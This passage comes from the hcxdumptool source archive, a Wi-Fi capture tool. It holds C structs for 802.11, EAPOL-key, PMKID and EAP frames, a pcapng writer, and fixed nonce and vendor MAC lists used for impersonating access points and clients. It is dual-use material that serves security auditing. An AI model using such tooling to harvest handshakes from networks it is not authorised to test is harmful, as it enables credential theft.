LLC_TYPE_IPV4 0x0800 #define LLC_TYPE_IPV6 0x86dd #define LLC_TYPE_PREAUT 0x88c7 #define LLC_TYPE_FRRR 0x890d }; typedef struct llc_frame llc_t; #define LLC_SIZE (sizeof(llc_t)) #define LLC_SNAP 0xaa /*===========================================================================*/ struct authentication_frame { uint16_t authentication_algho; #define OPEN_SYSTEM 0 #define SHARED_KEY 1 #define FBT 2 #define SAE 3 #define FILS 4 #define FILSPFS 5 #define FILSPK 6 #define NETWORKEAP 128 uint16_t authentication_seq; uint16_t statuscode; } __attribute__((__packed__)); typedef struct authentication_frame authf_t; #define AUTHENTICATIONFRAME_SIZE (sizeof(authf_t)) /*===========================================================================*/ struct sae_commit_authentication_frame { uint16_t group_id; uint8_t scalar[32]; uint8_t commit_element_x[32]; uint8_t commit_element_y[32]; } __attribute__((__packed__)); typedef struct sae_commit_authentication_frame saecommitauthf_t; #define SAECOMMITAUTHENTICATIONFRAME_SIZE (sizeof(saecommitauthf_t)) /*===========================================================================*/ struct sae_confirm_authentication_frame { uint16_t send_confirm; uint8_t confirm[32]; } __attribute__((__packed__)); typedef struct sae_confirm_authentication_frame saeconfirmauthf_t; #define SAECONFIRMAUTHENTICATIONFRAME_SIZE (sizeof(saeconfirmauthf_t)) /*===========================================================================*/ struct association_resp_frame { uint16_t capabilities; uint16_t authentication_seq; uint16_t statuscode; uint16_t id; } __attribute__((__packed__)); typedef struct association_resp_frame assocrepf_t; #define ASSOCIATIONRESPFRAME_SIZE (sizeof(assocrepf_t)) /*===========================================================================*/ struct action_frame { uint8_t categoriecode; #define CAT_BLOCK_ACK 3 #define CAT_RADIO_MEASUREMENT 5 uint8_t actioncode; #define ACT_ADD_BLOCK_ACK_REQ 0 #define ACT_ADD_BLOCK_ACK_RESP 0 #define ACT_DELETE_BLOCK_REQ 2 #define ACT_RADIO_MEASUREMENT_REQ 0 }; typedef struct action_frame actf_t; #define ACTIONFRAME_SIZE (sizeof(actf_t)) /*===========================================================================*/ struct eapauthentication_frame { uint8_t version; uint8_t type; #define EAP_PACKET 0 #define EAPOL_START 1 #define EAPOL_LOGOFF 2 #define EAPOL_KEY 3 #define EAPOL_ASF 4 #define EAPOL_MKA 5 uint16_t len; uint8_t data[1]; } __attribute__((__packed__)); typedef struct eapauthentication_frame eapauth_t; #define EAPAUTH_SIZE offsetof(eapauth_t, data) /*===========================================================================*/ struct wpakey_frame { uint8_t keydescriptor; uint16_t keyinfo; uint16_t keylen; uint64_t replaycount; uint8_t nonce[32]; uint8_t keyiv[16]; uint64_t keyrsc; uint8_t keyid[8]; uint8_t keymic[16]; uint16_t wpadatalen; uint8_t data[1]; } __attribute__((__packed__)); typedef struct wpakey_frame wpakey_t; #define WPAKEY_SIZE offsetof(wpakey_t, data) /*===========================================================================*/ struct pmkid_frame { uint8_t id; uint8_t len; uint8_t oui[3]; uint8_t type; uint8_t pmkid[16]; } __attribute__((__packed__)); typedef struct pmkid_frame pmkid_t; #define PMKID_SIZE (sizeof(pmkid_t)) /*===========================================================================*/ struct exteap_frame { uint8_t code; #define EAP_CODE_REQ 1 #define EAP_CODE_RESP 2 #define EAP_CODE_SUCCESS 3 #define EAP_CODE_FAILURE 4 #define EAP_CODE_INITIATE 5 #define EAP_CODE_FINISH 6 uint8_t id; #define EAP_TYPE_ID 1 uint16_t extlen; uint8_t exttype; #define EAP_TYPE_EAP 0 #define EAP_TYPE_ID 1 #define EAP_TYPE_NOTIFY 2 #define EAP_TYPE_NAK 3 #define EAP_TYPE_MD5 4 #define EAP_TYPE_OTP 5 #define EAP_TYPE_GTC 6 #define EAP_TYPE_RSA 9 #define EAP_TYPE_DSS 10 #define EAP_TYPE_KEA 11 #define EAP_TYPE_KEA_VALIDATE 12 #define EAP_TYPE_TLS 13 #define EAP_TYPE_AXENT 14 #define EAP_TYPE_RSA_SSID 15 #define EAP_TYPE_RSA_ARCOT 16 #define EAP_TYPE_LEAP 17 #define EAP_TYPE_SIM 18 #define EAP_TYPE_SRP_SHA1 19 #define EAP_TYPE_TTLS 21 #define EAP_TYPE_RAS 22 #define EAP_TYPE_AKA 23 #define EAP_TYPE_3COMEAP 24 #define EAP_TYPE_PEAP 25 #define EAP_TYPE_MSEAP 26 #define EAP_TYPE_MAKE 27 #define EAP_TYPE_CRYPTOCARD 28 #define EAP_TYPE_MSCHAPV2 29 #define EAP_TYPE_DYNAMICID 30 #define EAP_TYPE_ROB 31 #define EAP_TYPE_POTP 32 #define EAP_TYPE_MSTLV 33 #define EAP_TYPE_SENTRI 34 #define EAP_TYPE_AW 35 #define EAP_TYPE_CSBA 36 #define EAP_TYPE_AIRFORT 37 #define EAP_TYPE_HTTPD 38 #define EAP_TYPE_SS 39 #define EAP_TYPE_DC 40 #define EAP_TYPE_SPEKE 41 #define EAP_TYPE_MOBAC 42 #define EAP_TYPE_FAST 43 #define EAP_TYPE_ZLXEAP 44 #define EAP_TYPE_LINK 45 #define EAP_TYPE_PAX 46 #define EAP_TYPE_PSK 47 #define EAP_TYPE_SAKE 48 #define EAP_TYPE_IKEV2 49 #define EAP_TYPE_AKA1 50 #define EAP_TYPE_GPSK 51 #define EAP_TYPE_PWD 52 #define EAP_TYPE_EKE1 53 #define EAP_TYPE_PTEAP 54 #define EAP_TYPE_TEAP 55 #define EAP_TYPE_EXPAND 254 #define EAP_TYPE_EXPERIMENTAL 255 uint8_t data[1]; } __attribute__((__packed__)); typedef struct exteap_frame exteap_t; #define EXTEAP_SIZE offsetof(exteap_t, data) /*===========================================================================*/ struct eapleap_frame { uint8_t code; uint8_t id; uint16_t len; uint8_t type; uint8_t version; uint8_t reserved; uint8_t count; uint8_t data[1]; } __attribute__((__packed__)); typedef struct eapleap_frame eapleap_t; #define EAPLEAP_SIZE offsetof(eapleap_t, data) /*===========================================================================*/ struct mpdu_frame { uint8_t pn[3]; uint8_t keyid; uint8_t exitiv[4]; }; typedef struct mpdu_frame mpdu_t; #define MPDU_SIZE (sizeof(mpdu_t)) /*===========================================================================*/ struct md5_frame { uint8_t code; uint8_t id; uint16_t len; uint8_t type; uint8_t data_len; uint8_t data[1]; } __attribute__((__packed__)); typedef struct md5_frame md5_t; #define MD5_SIZE offsetof(md5_t, data) /*===========================================================================*/ struct ipv4_frame { uint8_t ver_hlen; uint8_t tos; uint16_t len; uint16_t ipid; uint16_t flags_offset; uint8_t ttl; uint8_t nextprotocol; #define NEXTHDR_HOP 0 /* Hop-by-hop option header. */ #define NEXTHDR_ICMP4 1 /* ICMP4 header */ #define NEXTHDR_TCP 6 /* TCP segment. */ #define NEXTHDR_UDP 17 /* UDP message. */ #define NEXTHDR_IPV6 41 /* IPv6 in IPv6 */ #define NEXTHDR_ROUTING 43 /* Routing header. */ #define NEXTHDR_FRAGMENT 44 /* Fragmentation/reassembly header. */ #define NEXTHDR_GRE 47 /* GRE header. */ #define NEXTHDR_ESP 50 /* Encapsulating security payload. */ #define NEXTHDR_AUTH 51 /* Authentication header. */ #define NEXTHDR_ICMP6 58 /* ICMP6 for IPv6. */ #define NEXTHDR_NONE 59 /* No next header */ #define NEXTHDR_DEST 60 /* Destination options header. */ #define NEXTHDR_SCTP 132 /* SCTP message. */ #define NEXTHDR_MOBILITY 135 /* Mobility header. */ #define NEXTHDR_MAX 255 uint16_t checksum; uint8_t srcaddr[4]; uint8_t dstaddr[4]; } __attribute__ ((packed)); typedef struct ipv4_frame ipv4_t; #define IPV4_SIZE (sizeof(ipv4_t)) #define IPV4_SIZE_MIN 20 #define IPV4_SIZE_MAX 64 /*===========================================================================*/ struct ipv6_frame { uint32_t ver_class; uint16_t len; uint8_t nextprotocol; uint8_t hoplimint; uint8_t srcaddr[16]; uint8_t dstaddr[16]; } __attribute__ ((packed)); typedef struct ipv6_frame ipv6_t; #define IPV6_SIZE (sizeof(ipv6_t)) /*===========================================================================*/ struct tcp_frame { uint16_t sourceport; uint16_t destinationport; uint32_t sequencenumber; uint32_t acknumber; uint8_t len /* x 4 */; uint8_t flags; uint16_t window; uint16_t checksum; uint16_t urgent; uint8_t options[1]; } __attribute__ ((packed)); typedef struct tcp_frame tcp_t; #define TCP_SIZE_MIN offsetof(tcp_t, options) /*===========================================================================*/ struct udp_frame { uint16_t sourceport; uint16_t destinationport; #define UDP_DHCP_SERVERPORT 67 #define UDP_DHCP_CLIENTPORT 68 #define UDP_DHCP6_SERVERPORT 547 #define UDP_DHCP6_CLIENTPORT 546 #define UDP_RADIUS_DESTINATIONPORT 1812 #define UDP_TZSP_DESTINATIONPORT 37008 uint16_t len; uint16_t checksum; } __attribute__ ((packed)); typedef struct udp_frame udp_t; #define UDP_SIZE (sizeof(udp_t)) /*===========================================================================*/ struct tzsp_frame { uint8_t version; uint8_t type; uint16_t enc_protocol; #define TZSP_ENCAP_ETHERNET 1 #define TZSP_ENCAP_TOKEN_RING 2 #define TZSP_ENCAP_SLIP 3 #define TZSP_ENCAP_PPP 4 #define TZSP_ENCAP_FDDI 5 #define TZSP_ENCAP_RAW 7 #define TZSP_ENCAP_IEEE_802_11 18 #define TZSP_ENCAP_IEEE_802_11_PRISM 119 #define TZSP_ENCAP_IEEE_802_11_AVS 127 uint8_t data[1]; } __attribute__ ((packed)); typedef struct tzsp_frame tzsp_t; #define TZSP_SIZE offsetof(tzsp_t, data) /*===========================================================================*/ struct tzsp_tag { uint8_t tag; #define TZSP_TAG_END 1 #define TZSP_TAG_ORGLEN 41 uint8_t len; uint8_t data[1]; } __attribute__ ((packed)); typedef struct tzsp_tag tzsptag_t; #define TZSPTAG_SIZE offsetof(tzsptag_t, data) /*===========================================================================*/ struct gre_frame { uint16_t flags; uint16_t type; uint16_t len; uint16_t callid; } __attribute__ ((packed)); typedef struct gre_frame gre_t; #define GRE_SIZE (sizeof(gre_t)) #define GREPROTO_PPP 0x880b #define GRE_FLAG_SNSET 0x1000 #define GRE_FLAG_ACKSET 0x0080 #define GRE_MASK_VERSION 0x0003 /*===========================================================================*/ struct ptp_frame { uint16_t type; } __attribute__ ((packed)); typedef struct ptp_frame ptp_t; #define PTP_SIZE (sizeof(ptp_t)) #define PROTO_PAP 0xc023 #define PROTO_CHAP 0xc223 /*===========================================================================*/ struct chap_frame { uint8_t code; #define CHAP_CODE_REQ 1 #define CHAP_CODE_RESP 2 uint8_t id; uint16_t len; uint8_t data[1]; } __attribute__ ((packed)); typedef struct chap_frame chap_t; #define CHAP_SIZE (sizeof(chap_t)) /*===========================================================================*/ struct tacacsp_frame { uint8_t version; #define TACACSP_VERSION 0xc0 uint8_t type; #define TACACS_AUTHENTICATION 1 uint8_t sequencenr; uint8_t flags; uint32_t sessionid; uint32_t len; uint8_t data[1]; } __attribute__ ((packed)); typedef struct tacacsp_frame tacacsp_t; #define TACACSP_SIZE offsetof(tacacsp_t, data) /*===========================================================================*/ #define RADIUS_AUTHENTICATOR_LENGTH 16 #define RADIUS_PASSWORD_BLOCK_SIZE 16 #define RADIUS_HEADER_LENGTH 20 #define RADIUS_MAX_SIZE 1000 #define RADIUS_MAX_ATTRIBUTE_SIZE 253 struct radius_frame_t { uint8_t code; uint8_t id; uint16_t length; uint8_t authenticator[RADIUS_AUTHENTICATOR_LENGTH]; uint8_t attrs[RADIUS_MAX_SIZE -RADIUS_HEADER_LENGTH]; uint8_t data[1]; } __attribute__ ((packed)); typedef struct radius_frame_t radius_t; #define RADIUS_SIZE offsetof(radius_t, data) /*===========================================================================*/ /* global var */ static const uint8_t nulliv[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; #define NULLIV_SIZE (sizeof(nulliv)) static const uint8_t nullnonce[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; #define NULLNONCE_SIZE (sizeof(nullnonce)) static const uint8_t mynonce[] = { 0x68, 0x20, 0x09, 0xe2, 0x1f, 0x0e, 0xbc, 0xe5, 0x62, 0xb9, 0x06, 0x5b, 0x54, 0x89, 0x79, 0x09, 0x9a, 0x65, 0x52, 0x86, 0xc0, 0x77, 0xea, 0x28, 0x2f, 0x6a, 0xaf, 0x13, 0x8e, 0x50, 0xcd, 0xb9 }; #define ANONCE_SIZE sizeof(anonce) static const uint8_t mac_broadcast[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; static const uint8_t mac_null[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; static const int myvendorap[] = { 0x00006c, 0x000101, 0x00054f, 0x000578, 0x000b18, 0x000bf4, 0x000c53, 0x000d58, 0x000da7, 0x000dc2, 0x000df2, 0x000e17, 0x000e22, 0x000e2a, 0x000eef, 0x000f09, 0x0016b4, 0x001761, 0x001825, 0x002067, 0x00221c, 0x0022f1, 0x00234a, 0x00238c, 0x0023f7, 0x002419, 0x0024fb, 0x00259d, 0x0025df, 0x00269f, 0x005047, 0x005079, 0x0050c7, 0x0084ed, 0x0086a0, 0x00a054, 0x00a085, 0x00bb3a, 0x00cb00, 0x0418b6, 0x0c8112, 0x100000, 0x10ae60, 0x10b713, 0x1100aa, 0x111111, 0x140708, 0x146e0a, 0x18421d, 0x1cf4ca, 0x205b2a, 0x20d160, 0x24336c, 0x24bf74, 0x28ef01, 0x3cb87a, 0x487604, 0x48f317, 0x50e14a, 0x544e45, 0x580943, 0x586ed6, 0x5c6b4f, 0x609620, 0x68e166, 0x706f81, 0x78f944, 0x7ce4aa, 0x8c8401, 0x8ce748, 0x906f18, 0x980ee4, 0x9c93e4, 0xa468bc }; #define MYVENDORAP_SIZE sizeof(myvendorap) static const int myvendorsta[] = { 0xa4a6a9, 0xacde48, 0xb025aa, 0xb0ece1, 0xb0febd, 0xb4e1eb, 0xc02250, 0xc8aacc, 0xd85dfb, 0xdc7014, 0xe00db9, 0xe0cb1d, 0xe80410, 0xf04f7c, 0xf0a225, 0xfcc233 }; #define MYVENDORSTA_SIZE sizeof(myvendorsta) /*===========================================================================*/ hcxdumptool-5.1.7/include/pcap.c000066400000000000000000000136441350370021700166120ustar00rootroot00000000000000#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include "pcap.h" /*===========================================================================*/ uint16_t addoption(uint8_t *shb, uint16_t optioncode, uint16_t optionlen, char *option) { uint16_t padding; option_header_t *optionhdr; optionhdr = (option_header_t*)shb; optionhdr->option_code = optioncode; optionhdr->option_length = optionlen; padding = (4 -(optionlen %4)) %4; memset(optionhdr->option_data, 0, optionlen +padding); memcpy(optionhdr->option_data, option, optionlen); return optionlen + padding +4; } /*===========================================================================*/ bool writeisb(int fd, uint32_t interfaceid, uint64_t starttimestamp, uint64_t incomming) { int written; struct timeval tvend; uint64_t endtimestamp; interface_statistics_block_t *isbhdr; uint8_t isb[1024]; memset(&isb, 0, 256); isbhdr = (interface_statistics_block_t*)isb; isbhdr->block_type = ISBID; isbhdr->total_length = ISB_SIZE; isbhdr->interface_id = interfaceid; gettimeofday(&tvend, NULL); endtimestamp = ((uint64_t)tvend.tv_sec * 1000000) + tvend.tv_usec; isbhdr->timestamp_high = endtimestamp >> 32; isbhdr->timestamp_low = (uint32_t)endtimestamp &0xffffffff; isbhdr->code_starttime = ISB_STARTTIME; isbhdr->starttime_len = 8; isbhdr->starttime_timestamp_high = starttimestamp >> 32; isbhdr->starttime_timestamp_low = (uint32_t)starttimestamp &0xffffffff; isbhdr->code_endtime = ISB_ENDTIME; isbhdr->endtime_len = 8; isbhdr->endtime_timestamp_high = endtimestamp >> 32; isbhdr->endtime_timestamp_low = (uint32_t)endtimestamp &0xffffffff; isbhdr->code_recv = ISB_IFRECV; isbhdr->recv_len = 8; isbhdr->recv = incomming; isbhdr->code_ifdrop = ISB_IFDROP; isbhdr->ifdrop_len = 8; isbhdr->ifdrop = 0; isbhdr->code_filteraccept = ISB_FILTERACCEPT; isbhdr->filteraccept_len = 8; isbhdr->filteraccept = incomming; isbhdr->code_osdrop = ISB_OSDROP; isbhdr->osdrop_len = 8; isbhdr->osdrop = 0; isbhdr->code_usredliv = ISB_USRDELIV; isbhdr->usredliv_len = 8; isbhdr->usredliv = incomming; isbhdr->code_eoo = 0; isbhdr->eoo_len = 0; isbhdr->total_length_dup = ISB_SIZE; written = write(fd, &isb, ISB_SIZE); if(written != ISB_SIZE) { close(fd); return false; } return true; } /*===========================================================================*/ bool writeidb(int fd, uint8_t *macorig, char *interfacestr) { int idblen; int written; interface_description_block_t *idbhdr; total_length_t *totallenght; char vendor[6]; uint8_t idb[1024]; memset(&idb, 0, 256); idblen = IDB_SIZE; idbhdr = (interface_description_block_t*)idb; idbhdr->block_type = IDBID; idbhdr->linktype = DLT_IEEE802_11_RADIO; idbhdr->reserved = 0; idbhdr->snaplen = PCAPNG_MAXSNAPLEN; idblen += addoption(idb +idblen, IF_NAME, strlen(interfacestr), interfacestr); memset(&vendor, 0, 6); memcpy(&vendor, macorig, 3); idblen += addoption(idb +idblen, IF_MACADDR, 6, vendor); idblen += addoption(idb +idblen, SHB_EOC, 0, NULL); totallenght = (total_length_t*)(idb +idblen); idblen += TOTAL_SIZE; idbhdr->total_length = idblen; totallenght->total_length = idblen; written = write(fd, &idb, idblen); if(written != idblen) { close(fd); return false; } return true; } /*===========================================================================*/ bool writeshb(int fd, uint8_t *macmyap, uint64_t rcrandom, uint8_t *anoncerandom, uint8_t *macmysta) { int shblen; int written; section_header_block_t *shbhdr; optionfield64_t *of; total_length_t *totallenght; struct utsname unameData; char sysinfo[256]; uint8_t shb[1024]; memset(&shb, 0, 256); shblen = SHB_SIZE; shbhdr = (section_header_block_t*)shb; shbhdr->block_type = PCAPNGBLOCKTYPE; #ifdef BIG_ENDIAN_HOST shbhdr->byte_order_magic = PCAPNGMAGICNUMBERBE; #else shbhdr->byte_order_magic = PCAPNGMAGICNUMBER; #endif shbhdr->byte_order_magic = PCAPNGMAGICNUMBER; shbhdr->major_version = PCAPNG_MAJOR_VER; shbhdr->minor_version = PCAPNG_MINOR_VER; shbhdr->section_length = -1; if(uname(&unameData) == 0) { shblen += addoption(shb +shblen, SHB_HARDWARE, strlen(unameData.machine), unameData.machine); sprintf(sysinfo, "%s %s", unameData.sysname, unameData.release); shblen += addoption(shb +shblen, SHB_OS, strlen(sysinfo), sysinfo); sprintf(sysinfo, "hcxdumptool %s", VERSION); shblen += addoption(shb +shblen, SHB_USER_APPL, strlen(sysinfo), sysinfo); } shblen += addoption(shb +shblen, OPTIONCODE_MACMYAP, 6, (char*)macmyap); of = (optionfield64_t*)(shb +shblen); of->option_code = OPTIONCODE_RC; of->option_length = 8; of->option_value = rcrandom; shblen += 12; shblen += addoption(shb +shblen, OPTIONCODE_ANONCE, 32, (char*)anoncerandom); shblen += addoption(shb +shblen, OPTIONCODE_MACMYSTA, 6, (char*)macmysta); shblen += addoption(shb +shblen, SHB_EOC, 0, NULL); totallenght = (total_length_t*)(shb +shblen); shblen += TOTAL_SIZE; shbhdr->total_length = shblen; totallenght->total_length = shblen; written = write(fd, &shb, shblen); if(written != shblen) { close(fd); return false; } return true; } /*===========================================================================*/ int hcxcreatepcapngdump(char *pcapngdumpname, uint8_t *macorig, char *interfacestr, uint8_t *macmyap, uint64_t rcrandom, uint8_t *anoncerandom, uint8_t *macmysta) { int c; int fd; struct stat statinfo; char newpcapngoutname[PATH_MAX +2]; c = 0; strcpy(newpcapngoutname, pcapngdumpname); while(stat(newpcapngoutname, &statinfo) == 0) { snprintf(newpcapngoutname, PATH_MAX, "%s-%d", pcapngdumpname, c); c++; } umask(0); fd = open(newpcapngoutname, O_WRONLY | O_CREAT, 0644); if(fd == -1) { return -1; } if(writeshb(fd, macmyap, rcrandom, anoncerandom, macmysta) == false) { return -1; } if(writeidb(fd, macorig, interfacestr) == false) { return -1; } return fd; } /*===========================================================================*/ hcxdumptool-5.1.7/include/pcap.h000066400000000000000000000174421350370021700166170ustar00rootroot00000000000000#define PCAPMAGICNUMBER 0xa1b2c3d4 #define PCAPMAGICNUMBERBE 0xd4c3b2a1 #define PCAPNGBLOCKTYPE 0x0a0d0d0a #define PCAPNGMAGICNUMBER 0x1a2b3c4d #define PCAPNGMAGICNUMBERBE 0x4d3c2b1a #define PCAPNG_MAJOR_VER 1 #define PCAPNG_MINOR_VER 0 #define PCAPNG_MAXSNAPLEN 0xffff #define OPTIONCODE_MACMYAP 62107 #define OPTIONCODE_RC 62108 #define OPTIONCODE_ANONCE 62109 #define OPTIONCODE_MACMYSTA 62110 /*===========================================================================*/ /* Section Header Block (SHB) - ID 0x0A0D0D0A */ struct section_header_block_s { uint32_t block_type; /* block type */ uint32_t total_length; /* block length */ uint32_t byte_order_magic; /* byte order magic - indicates swapped data */ uint16_t major_version; /* major version of pcapng (1 atm) */ uint16_t minor_version; /* minor version of pcapng (0 atm) */ int64_t section_length; /* length of section - can be -1 (parsing necessary) */ } __attribute__((__packed__)); typedef struct section_header_block_s section_header_block_t; #define SHB_SIZE (sizeof(section_header_block_t)) /*===========================================================================*/ /* Header of all pcapng blocks */ struct block_header_s { uint32_t block_type; /* block type */ uint32_t total_length; /* block length */ } __attribute__((__packed__)); typedef struct block_header_s block_header_t; #define BH_SIZE (sizeof(block_header_t)) /*===========================================================================*/ /* total lenght*/ struct total_length_s { uint32_t total_length; } __attribute__((__packed__)); typedef struct total_length_s total_length_t; #define TOTAL_SIZE (sizeof(total_length_t)) /*===========================================================================*/ /* Header of all pcapng options */ struct option_header_s { #define SHB_EOC 0 #define SHB_COMMENT 1 #define SHB_HARDWARE 2 #define SHB_OS 3 #define SHB_USER_APPL 4 #define IF_NAME 2 #define IF_DESCRIPTION 3 #define IF_MACADDR 6 #define IF_TZONE 10 uint16_t option_code; /* option code - depending of block (0 - end of opts, 1 - comment are in common) */ uint16_t option_length; /* option length - length of option in bytes (will be padded to 32bit) */ char option_data[1]; } __attribute__((__packed__)); typedef struct option_header_s option_header_t; #define OH_SIZE (sizeof(option_header_t)) /*===========================================================================*/ /* Option Field */ struct optionfield64_s { uint16_t option_code; uint16_t option_length; uint64_t option_value; } __attribute__((__packed__)); typedef struct optionfield64_s optionfield64_t; #define OPTIONFIELD64_SIZE offsetof(optionfield64_t, data) /*===========================================================================*/ /* Interface Description Block (IDB) - ID 0x00000001 */ struct interface_description_block_s { uint32_t block_type; /* block type */ #define IDBID 0x00000001; uint32_t total_length; /* block length */ uint16_t linktype; /* the link layer type (was -network- in classic pcap global header) */ #define DLT_IEEE802_11_RADIO 127 uint16_t reserved; /* 2 bytes of reserved data */ uint32_t snaplen; /* maximum number of bytes dumped from each packet (was -snaplen- in classic pcap global header */ } __attribute__((__packed__)); typedef struct interface_description_block_s interface_description_block_t; #define IDB_SIZE (sizeof(interface_description_block_t)) /*===========================================================================*/ /* Packet Block (PB) - ID 0x00000002 (OBSOLETE - EPB should be used instead) */ struct packet_block_s { uint32_t block_type; /* block type */ uint32_t total_length; /* block length */ uint16_t interface_id; /* the interface the packet was captured from - identified by interface description block in current section */ uint16_t drops_count; /* packet dropped by IF and OS since prior packet */ uint32_t timestamp_high; /* high bytes of timestamp */ uint32_t timestamp_low; /* low bytes of timestamp */ uint32_t cap_len; /* length of packet in the capture file (was -incl_len- in classic pcap packet header) */ uint32_t org_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */ } __attribute__((__packed__)); typedef struct packet_block_s packet_block_t; #define PB_SIZE (sizeof(packet_block_t)) /*===========================================================================*/ /* Simple Packet Block (SPB) - ID 0x00000003 */ struct simple_packet_block_s { uint32_t block_type; /* block type */ uint32_t total_length; /* block length */ uint32_t original_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */ } __attribute__((__packed__)); typedef struct simple_packet_block_s simple_packet_block_t; #define SPB_SIZE (sizeof(simple_packet_block_t)) /*===========================================================================*/ /* Name Resolution Block (NRB) - ID 0x00000004 */ struct name_resolution_block_s { uint32_t block_type; /* block type */ uint32_t total_length; /* block length */ uint16_t record_type; /* type of record (ipv4 / ipv6) */ uint16_t record_length; /* length of record value */ } __attribute__((__packed__)); typedef struct name_resolution_block_s name_resolution_block_t; #define NRB_SIZE (sizeof(name_resolution_block_t)) /*===========================================================================*/ /* Interface Statistics Block - ID 0x00000005 */ struct interface_statistics_block_s { uint32_t block_type; /* block type */ #define ISBID 0x00000005; uint32_t total_length; /* block length */ uint32_t interface_id; /* the interface the stats refer to - identified by interface description block in current section */ uint32_t timestamp_high; /* high bytes of timestamp */ uint32_t timestamp_low; /* low bytes of timestamp */ #define ISB_STARTTIME 2 #define ISB_ENDTIME 3 #define ISB_IFRECV 4 #define ISB_IFDROP 5 #define ISB_FILTERACCEPT 6 #define ISB_OSDROP 7 #define ISB_USRDELIV 8 uint16_t code_starttime; uint16_t starttime_len; uint32_t starttime_timestamp_high; /* high bytes of timestamp */ uint32_t starttime_timestamp_low; /* low bytes of timestamp */ uint16_t code_endtime; uint16_t endtime_len; uint32_t endtime_timestamp_high; /* high bytes of timestamp */ uint32_t endtime_timestamp_low; /* low bytes of timestamp */ uint16_t code_recv; uint16_t recv_len; uint64_t recv; uint16_t code_ifdrop; uint16_t ifdrop_len; uint64_t ifdrop; uint16_t code_filteraccept; uint16_t filteraccept_len; uint64_t filteraccept; uint16_t code_osdrop; uint16_t osdrop_len; uint64_t osdrop; uint16_t code_usredliv; uint16_t usredliv_len; uint64_t usredliv; uint16_t code_eoo; uint16_t eoo_len; uint32_t total_length_dup; /* block length */ } __attribute__((__packed__)); typedef struct interface_statistics_block_s interface_statistics_block_t; #define ISB_SIZE (sizeof(interface_statistics_block_t)) /*===========================================================================*/ /* Enhanced Packet Block (EPB) - ID 0x00000006 */ struct enhanced_packet_block_s { uint32_t block_type; /* block type */ #define EPBBID 0x00000006; uint32_t total_length; /* block length */ uint32_t interface_id; /* the interface the packet was captured from - identified by interface description block in current section */ uint32_t timestamp_high; /* high bytes of timestamp */ uint32_t timestamp_low; /* low bytes of timestamp */ uint32_t cap_len; /* length of packet in the capture file (was -incl_len- in classic pcap packet header) */ uint32_t org_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */ } __attribute__((__packed__)); typedef struct enhanced_packet_block_s enhanced_packet_block_t; #define EPB_SIZE (sizeof(enhanced_packet_block_t)) /*===========================================================================*/ hcxdumptool-5.1.7/include/rpigpio.h000066400000000000000000000007651350370021700173450ustar00rootroot00000000000000#define GPIO_DELAY 100000 #define GPIO_PERI_BASE_OLD 0x20000000 #define GPIO_PERI_BASE_NEW 0x3F000000 #define GPIO_BASE 0x200000 #define PAGE_SIZE (4*1024) #define BLOCK_SIZE (4*1024) #define INP_GPIO(g) *(gpio +((g) /10)) &= ~(7 << (((g) %10) *3)) #define OUT_GPIO(g) *(gpio +((g) /10)) |= (1 << (((g) %10) *3)) #define GPIO_SET *(gpio +7) #define GPIO_CLR *(gpio +10) #define GET_GPIO(g) (*(gpio +13) & (1 << g)) static int rpirevision; static void *gpio_map; static volatile unsigned *gpio; hcxdumptool-5.1.7/include/strings.c000066400000000000000000000037451350370021700173610ustar00rootroot00000000000000/*===========================================================================*/ bool isasciistring(int len, uint8_t *buffer) { uint8_t p; for(p = 0; p < len; p++) { if((buffer[p] < 0x20) || (buffer[p] > 0x7e)) { return false; } } return true; } /*===========================================================================*/ bool ishexvalue(const char *str, size_t len) { size_t c; for(c = 0; c < len; c++) { if(str[c] < '0') { return false; } if(str[c] > 'f') { return false; } if((str[c] > '9') && (str[c] < 'A')) { return false; } if((str[c] > 'F') && (str[c] < 'a')) { return false; } } return true; } /*===========================================================================*/ bool hex2bin(const char *str, uint8_t *bytes, size_t blen) { uint8_t pos; uint8_t idx0; uint8_t idx1; uint8_t hashmap[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, // 01234567 0x08, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // 89:;<=>? 0x00, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x00, // @ABCDEFG 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // HIJKLMNO 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // PQRSTUVW 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // XYZ[\]^_ 0x00, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x00, // `abcdefg 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // hijklmno }; if(ishexvalue(str, blen) == false) { return false; } memset(bytes, 0, blen); for (pos = 0; ((pos < (blen*2)) && (pos < strlen(str))); pos += 2) { idx0 = ((uint8_t)str[pos+0] & 0x1F) ^ 0x10; idx1 = ((uint8_t)str[pos+1] & 0x1F) ^ 0x10; bytes[pos/2] = (uint8_t)(hashmap[idx0] << 4) | hashmap[idx1]; }; return true; } /*===========================================================================*/ size_t ishexify(const char *str) { char *hexid = "$HEX["; size_t len; len = strlen(str); if((memcmp(str, hexid, 5) == 0) && (str[len -1] == ']') && (len % 2 == 0)) { return (len -6)/2; } return 0; } /*===========================================================================*/ hcxdumptool-5.1.7/include/version.h000066400000000000000000000000641350370021700173510ustar00rootroot00000000000000#define VERSION "5.1.7" #define VERSION_JAHR "2019" hcxdumptool-5.1.7/include/wireless-lite.h000066400000000000000000000026571350370021700204660ustar00rootroot00000000000000#ifndef WIRELESS_LITE_H #define WIRELESS_LITE_H /* cleaned up from linux/wireless.h */ #include #define SIOCGIWNAME 0x8b01 #define SIOCSIWFREQ 0x8b04 #define 